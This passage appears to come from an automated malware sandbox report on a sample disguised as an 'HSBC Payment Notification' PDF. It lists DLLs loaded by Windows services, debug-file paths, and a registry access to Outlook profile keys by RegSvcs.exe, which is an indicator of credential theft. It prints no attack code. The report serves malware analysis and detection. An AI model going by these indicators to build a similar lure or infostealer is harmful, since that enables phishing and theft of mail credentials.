                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic file information: File size 1587200 > 1048576
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2086108472.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2752944909.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
                  Source: Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2804279268.0000000000840000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: wbengine.exe.2.dr
                  Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2508157176.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2489813894.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
